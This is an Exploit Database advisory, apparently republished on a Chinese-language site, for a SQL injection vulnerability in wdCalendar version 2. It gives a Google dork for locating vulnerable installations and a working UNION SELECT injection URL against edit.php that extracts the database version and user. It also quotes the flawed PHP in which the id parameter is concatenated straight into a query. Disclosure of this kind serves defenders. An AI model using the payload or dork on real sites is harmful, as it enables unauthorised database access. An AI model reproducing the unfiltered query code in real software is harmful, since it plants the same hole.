wdCalendar 2 – SQL Injection

• Exploit Database
• 38 阅读

• 作者： Alfonso Castillo Angel
  日期： 2016-09-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40364/

• # Exploit Title: wdcalendar version 2 sql injection vulnerability
  # Google Dork: allinurl:"wdcalendar/edit.php"
  # Date: 12/09/2016
  # Exploit Author: Alfonso Castillo Angel
  # Software Link: https://github.com/ronisaha/wdCalendar
  # Version: Version 2
  # Tested on: Windows 7 ultimate
  # Category: webapps
  
   * Affected file -> edit.php and edit.db.php
   * Exploit ->
  http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--
  
  
   * Vulnerable code:
  
   function getCalendarByRange($id){
  try{
  $db = new DBConnection();
  $db->getConnection();
  $sql = "select * from `jqcalendar` where `id` = " . $id;//the
  variable is not filtered properly
  $handle = mysql_query($sql);
  //echo $sql;
  $row = mysql_fetch_object($handle);
  }catch(Exception $e){
  }
  return $row;
  }
  if($_GET["id"]){
  $event = getCalendarByRange($_GET["id"]); //the variable is not filtered
  properly